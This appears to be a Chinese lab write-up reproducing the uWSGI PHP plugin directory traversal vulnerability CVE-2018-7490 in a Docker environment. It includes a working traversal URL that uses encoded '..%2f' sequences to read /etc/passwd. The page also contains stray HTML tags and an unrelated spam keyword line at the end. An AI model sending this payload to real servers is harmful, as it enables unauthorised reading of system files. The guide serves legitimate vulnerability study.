<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    uWSGI PHP目錄穿越漏洞(CVE-2018-7490)

    Path uwsgi/CVE-2018-7490

    uWSGI是一款Web應用程序服務器,它實現了WSGI、uwsgi和http等協議,并支持通過插件來運行各種語言。

    uWSGI 2.0.17之前的PHP插件,沒有正確的處理DOCUMENT_ROOT檢測,導致用戶可以通過..%2f來跨越目錄,讀取或運行DOCUMENT_ROOT目錄以外的文件。

    漏洞環境

    運行存在漏洞的uWSGI服務器:

    docker-compose up -d
    

    運行完成后,訪問http://your-ip:8080/即可看到phpinfo信息,說明uwsgi-php服務器已成功運行。

    漏洞復現

    訪問http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功讀取文件:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类